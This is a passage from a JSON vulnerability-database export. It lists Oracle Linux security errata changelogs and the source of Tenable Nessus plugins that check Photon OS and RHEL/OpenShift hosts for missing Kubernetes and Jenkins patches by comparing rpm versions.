31446379]\n[4.14.35-1902.303.4.el7]\n- net/rds: suppress memory allocation failure reports (Manjunath Patil) [Orabug: 31422157]\n- rds: Do not cancel RDMAs that have been posted to the HCA (Hakon Bugge) [Orabug: 31422151]\n- rds: Introduce rds_conn_to_path helper (Hakon Bugge) [Orabug: 31422151]\n- xen/manage: enable C_A_D to force reboot (Dongli Zhang) [Orabug: 31422147]\nkata-image\n[1.7.3-1.0.5.1]\n- Address Kata CVE 2023\nkata-runtime\n[1.7.3-1.0.5]\n- Address Kata CVE-2020-2023\n- Address Kata CVE-2020-2024\n- Address Kata CVE-2020-2025\n- Address Kata CVE-2020-2026\nkata\n[1.7.3-1.0.7]\n- Address CVE-2020-2023\n- Address CVE-2020-2024\n- Address CVE-2020-2025\n- Address CVE-2020-2026\nkubernetes\n[1.14.9-1.0.6]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n[1.14.9-1.0.5]\n- Update dependency on Kata containers to a build that includes fixes for CVE-2020-2023 thru CVE-2020-2026\nolcne\n[1.0.5-3]\n- update registry image mirroring script\n[1.0.5-2]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n- Update bootstrap scripts\n[1.0.5-1]\n- Update Kata Containers to address CVEs 2020-2023 thru 2020-2026", "edition": 2, "modified": "2020-07-22T00:00:00", "published": "2020-07-22T00:00:00", "id": "ELSA-2020-5766", "href": "http://linux.oracle.com/errata/ELSA-2020-5766.html", "title": "Unbreakable Enterprise kernel-container kata-image kata-runtime kata kubernetes olcne security update", "type": "oraclelinux", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-07-23T05:32:14", "bulletinFamily": "unix", "cvelist": ["CVE-2020-8557", "CVE-2020-11080", "CVE-2020-0543", "CVE-2020-2026", "CVE-2020-10739", "CVE-2020-8559", "CVE-2020-15104", "CVE-2020-2024", "CVE-2020-1764", "CVE-2020-2023", "CVE-2020-2025"], "description": "kernel-uek-container\n[4.14.35-1902.303.5.3.el7]\n- rds: Deregister all FRWR mr with free_mr (Hans Westgaard Ry) [Orabug: 31476202]\n- Revert 'rds: Do not cancel RDMAs that have been posted to the HCA' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Introduce rds_conn_to_path helper' (Gerd Rausch) [Orabug: 31475329]\n- Revert 'rds: Three cancel fixes' (Gerd Rausch) [Orabug: 31475318]\n[4.14.35-1902.303.5.2.el7]\n- rds: Three cancel fixes (Hakon Bugge) [Orabug: 31463014]\n[4.14.35-1902.303.5.1.el7]\n- x86/speculation: Add SRBDS vulnerability and mitigation documentation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/speculation: Add Special Register Buffer Data Sampling (SRBDS) mitigation (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add 'table' argument to cpu_matches() (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n- x86/cpu: Add a steppings field to struct x86_cpu_id (Mark Gross) [Orabug: 31446720] {CVE-2020-0543}\n[4.14.35-1902.303.5.el7]\n- net/mlx5: Decrease default mr cache size (Artemy Kovalyov) [Orabug: 31446379]\n[4.14.35-1902.303.4.el7]\n- net/rds: suppress memory allocation failure reports (Manjunath Patil) [Orabug: 31422157]\n- rds: Do not cancel RDMAs that have been posted to the HCA (Hakon Bugge) [Orabug: 31422151]\n- rds: Introduce rds_conn_to_path helper (Hakon Bugge) [Orabug: 31422151]\nkata-image\n[1.7.3-1.0.5.1]\n- Address Kata CVE 2023\nkata-runtime\n[1.7.3-1.0.5]\n- Address Kata CVE-2020-2023\n- Address Kata CVE-2020-2024\n- Address Kata CVE-2020-2025\n- Address Kata CVE-2020-2026\nkata\n[1.7.3-1.0.7]\n- Address CVE-2020-2023\n- Address CVE-2020-2024\n- Address CVE-2020-2025\n- Address CVE-2020-2026\nkubernetes\n[1.14.9-1.0.6]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n[1.14.9-1.0.5]\n- Update dependency on Kata containers to a build that includes fixes for CVE-2020-2023 thru CVE-2020-2026\nkubernetes\n[1.17.9-1.0.1.el7]\n- Added Oracle specific build files for Kubernetes\nistio\n[1.4.10-1.0.1]\n- CVE-2020-15104:\n Incorrect validation of wildcard DNS Subject Alternative Names\n[1.4.10-1.0.0]\n- Added Oracle Specific Build Files for istio/istio\nolcne\n[1.1.2-6]\n- Include kata-runtime in the default template\n[1.1.2-5]\n- CVE-2020-8559: Privilege escalation from compromised node to cluster\n- CVE-2020-8557: Node disk DOS by writing to container /etc/hosts\n[1.1.2-4]\n- Update arguments added for istio module.\n[1.1.2-3]\n- Ensure Istio sidecar injector uses valid executable\n[1.1.2-2]\n- Update Kubernetes to use Kata 1.7.3-1.0.7 to address CVE-2020-2023 thru CVE-2020-2026\n[1.1.2-1]\n- Added istio-1.4.10 charts and updated istio.yaml to use istio-1.4.10", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2020-07-22T00:00:00", "id": "ELSA-2020-5765", "href": "http://linux.oracle.com/errata/ELSA-2020-5765.html", "title": "Unbreakable Enterprise kernel-container kata-image kata-runtime kata kubernetes kubernetes istio olcne security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-23T13:03:18", "description": "An update of the kubernetes package has been released.", "edition": 2, "cvss3": {"score": 6.8, "vector": "AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-09-21T00:00:00", "title": "Photon OS 2.0: Kubernetes PHSA-2020-2.0-0285", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-8557", "CVE-2020-8555", "CVE-2020-8559", "CVE-2019-11252"], "modified": "2020-09-21T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:kubernetes"], "id": "PHOTONOS_PHSA-2020-2_0-0285_KUBERNETES.NASL", "href": "https://www.tenable.com/plugins/nessus/140715", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-2.0-0285. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140715);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\n \"CVE-2019-11252\",\n \"CVE-2020-8555\",\n \"CVE-2020-8557\",\n \"CVE-2020-8559\"\n );\n\n script_name(english:\"Photon OS 2.0: Kubernetes PHSA-2020-2.0-0285\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the kubernetes package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-285.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8559\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:kubernetes\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'kubernetes-1.17.11-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'kubernetes-kubeadm-1.17.11-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'kubernetes-kubectl-extras-1.17.11-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'kubernetes-pause-1.17.11-1.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kubernetes');\n}\n\n\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-09-23T13:03:34", "description": "An update of the kubernetes package has been released.", "edition": 2, "cvss3": {"score": 6.8, "vector": "AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-09-21T00:00:00", "title": "Photon OS 3.0: Kubernetes PHSA-2020-3.0-0142", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-8557", "CVE-2020-8555", "CVE-2020-8559", "CVE-2019-11252"], "modified": "2020-09-21T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:kubernetes", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0142_KUBERNETES.NASL", "href": "https://www.tenable.com/plugins/nessus/140706", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0142. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140706);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\n \"CVE-2019-11252\",\n \"CVE-2020-8555\",\n \"CVE-2020-8557\",\n \"CVE-2020-8559\"\n );\n\n script_name(english:\"Photon OS 3.0: Kubernetes PHSA-2020-3.0-0142\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the kubernetes package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-142.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8559\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:kubernetes\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'kubernetes-1.17.11-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'kubernetes-kubeadm-1.17.11-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'kubernetes-kubectl-extras-1.17.11-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'kubernetes-pause-1.17.11-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kubernetes');\n}\n\n\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-09-26T10:27:55", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:3808 advisory.\n\n - jenkins: Stored XSS vulnerability in job build time trend (CVE-2020-2220)\n\n - jenkins: Stored XSS vulnerability in upstream cause (CVE-2020-2221)\n\n - jenkins: Stored XSS vulnerability in 'keep forever' badge icons (CVE-2020-2222)\n\n - jenkins: Stored XSS vulnerability in console links (CVE-2020-2223)\n\n - kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 5.4, "vector": "AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"}, "published": "2020-09-23T00:00:00", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.3.38 jenkins and openshift (RHSA-2020:3808)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-8557", "CVE-2020-2222", "CVE-2020-2221", "CVE-2020-2220", "CVE-2020-2223"], "modified": "2020-09-23T00:00:00", "cpe": ["cpe:/a:redhat:openshift:4.3::el7", "cpe:/a:redhat:openshift:4.3", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "cpe:/a:redhat:openshift:4.3::el8", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "cpe:/o:redhat:enterprise_linux:8"], "id": "REDHAT-RHSA-2020-3808.NASL", "href": "https://www.tenable.com/plugins/nessus/140749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:3808. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140749);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/25\");\n\n script_cve_id(\n \"CVE-2020-2220\",\n \"CVE-2020-2221\",\n \"CVE-2020-2222\",\n \"CVE-2020-2223\",\n \"CVE-2020-8557\"\n );\n script_xref(name:\"RHSA\", value:\"2020:3808\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.3.38 jenkins and openshift (RHSA-2020:3808)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:3808 advisory.\n\n - jenkins: Stored XSS vulnerability in job build time trend (CVE-2020-2220)\n\n - jenkins: Stored XSS vulnerability in upstream cause (CVE-2020-2221)\n\n - jenkins: Stored XSS vulnerability in 'keep forever' badge icons (CVE-2020-2222)\n\n - jenkins: Stored XSS vulnerability in console links (CVE-2020-2223)\n\n - kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8557\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:3808\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1835977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857425\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857427\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857431\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857433\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins and / or openshift-hyperkube packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-2223\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(79, 400);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(7|8)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\npkgs = [\n {'reference':'jenkins-2.235.5.1600415514-1.el7', 'release':'7'},\n {'reference':'openshift-hyperkube-4.3.37-202009120213.p0.git.0.dffefe4.el8', 'cpu':'s390x', 'release':'8'},\n {'reference':'openshift-hyperkube-4.3.37-202009120213.p0.git.0.dffefe4.el8', 'cpu':'x86_64', 'release':'8'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / openshift-hyperkube');\n}", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-09-14T18:19:38", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:3519 advisory.\n\n - jenkins: Stored XSS vulnerability in job build time trend (CVE-2020-2220)\n\n - jenkins: Stored XSS vulnerability in upstream cause (CVE-2020-2221)\n\n - jenkins: Stored XSS vulnerability in 'keep forever' badge icons (CVE-2020-2222)\n\n - jenkins: Stored XSS vulnerability in console links (CVE-2020-2223)\n\n - kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 5.4, "vector": "AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"}, "published": "2020-08-24T00:00:00", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.7 jenkins and openshift packages (RHSA-2020:3519)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-8557", "CVE-2020-2222", "CVE-2020-2221", "CVE-2020-2220", "CVE-2020-2223"], "modified": "2020-08-24T00:00:00", "cpe": ["cpe:/a:redhat:openshift:4.5::el8", "cpe:/a:redhat:openshift:4.5", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "cpe:/a:redhat:openshift:4.5::el7", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "cpe:/o:redhat:enterprise_linux:8"], "id": "REDHAT-RHSA-2020-3519.NASL", "href": "https://www.tenable.com/plugins/nessus/139772", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:3519. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139772);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/25\");\n\n script_cve_id(\n \"CVE-2020-2220\",\n \"CVE-2020-2221\",\n \"CVE-2020-2222\",\n \"CVE-2020-2223\",\n \"CVE-2020-8557\"\n );\n script_xref(name:\"RHSA\", value:\"2020:3519\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.7 jenkins and openshift packages (RHSA-2020:3519)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:3519 advisory.\n\n - jenkins: Stored XSS vulnerability in job build time trend (CVE-2020-2220)\n\n - jenkins: Stored XSS vulnerability in upstream cause (CVE-2020-2221)\n\n - jenkins: Stored XSS vulnerability in 'keep forever' badge icons (CVE-2020-2222)\n\n - jenkins: Stored XSS vulnerability in console links (CVE-2020-2223)\n\n - kubernetes: Node disk DOS by writing to container /etc/hosts (CVE-2020-8557)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2222\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-2223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-8557\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:3519\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1835977\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857425\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857427\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857431\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1857433\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins and / or openshift-hyperkube packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n 